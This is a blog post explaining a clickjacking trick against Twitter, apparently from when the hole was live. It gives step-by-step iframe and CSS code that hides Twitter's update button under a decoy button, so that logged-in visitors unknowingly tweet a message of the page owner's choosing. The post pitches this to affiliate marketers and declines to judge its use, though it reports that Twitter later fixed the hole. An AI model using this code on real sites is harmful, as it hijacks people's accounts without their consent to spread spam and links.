Evil Genius: How to Get People to Tweet for You Without Them Knowing

Written by and published

It all started with a tweet that said:

Don’t click http://tinyurl.com/amgzs6

If you click on the link it takes you to a white page with a button that says “Don’t Click.” And if you’re like me, you’ll click it and nothing happens. However, something does happen! A tweet mysteriously appears on your Twitter account with the same exact message — all thanks to Korben.Info.

It’s done through a very clever technique that utilizes an iframe and CSS. When you visit the page, it pulls in the Twitter reply page and auto-inserts the message. It then repositions the “Update” button over the fake “Don’t Click” button and then hides the “Update” button (all with CSS).

Rife with Exploitation

There are so many things you could do with this technique, it boggles my mind. For example, you could theoretically use it to promote an affiliate link. Although the original example was recursive in nature, you could use the same technique to get Twitter users to tweet your link without them knowing about it.

Affiliate Marketers Dream

An affiliate marketer could place the iframe on any page. In fact, they could put multiple iframes on one page if they wanted. Then they could overlay it on top of an actionable item. That could be a button, link or anything that a typical user might click on. Then, if they’re already logged into Twitter, it would automatically post whatever message the site wanted to their Twitter account.

Simple Code, Big Exploit

The code is remarkably simple for such a significant exploit. Below is a step-by-step example of how you do it.

1. Insert iframe

<iframe src="http://twitter.com/home?status=Put Message and Affiliate URL here" scrolling="no"></iframe>

2. Add the Link or Button

You can use a button or any other HTML element

<button>Button Text</button>

3. Create CSS for iframe and Button

iframe { position:absolute;width:550px;height:228px;top:-170px;left:-400px;z-index: 2;opacity: 0;filter: alpha(opacity=0); }
button { position:absolute;top:10px;left:10px;z-index:1;width: 120px; }

Should I Do This?

That’s not for me to decide. If you’re wondering if I’m going to use this technique, the answer is “probably not.” It’s outside of my own code of ethics for how I choose to market. So, you might be asking, then why share this? I’m sharing it because it’s knowledge. If someone wants to use it, fine. They can use it to their own demise or success. However, it can also be used to potentially close the exploit or to further more innovation. It’s really up to you and not for me to judge.


Pete Cashmore of Mashable is reporting that Twitter has fixed this exploit.

  • Guillermo Rauch

    Oh, and this is definitely not new!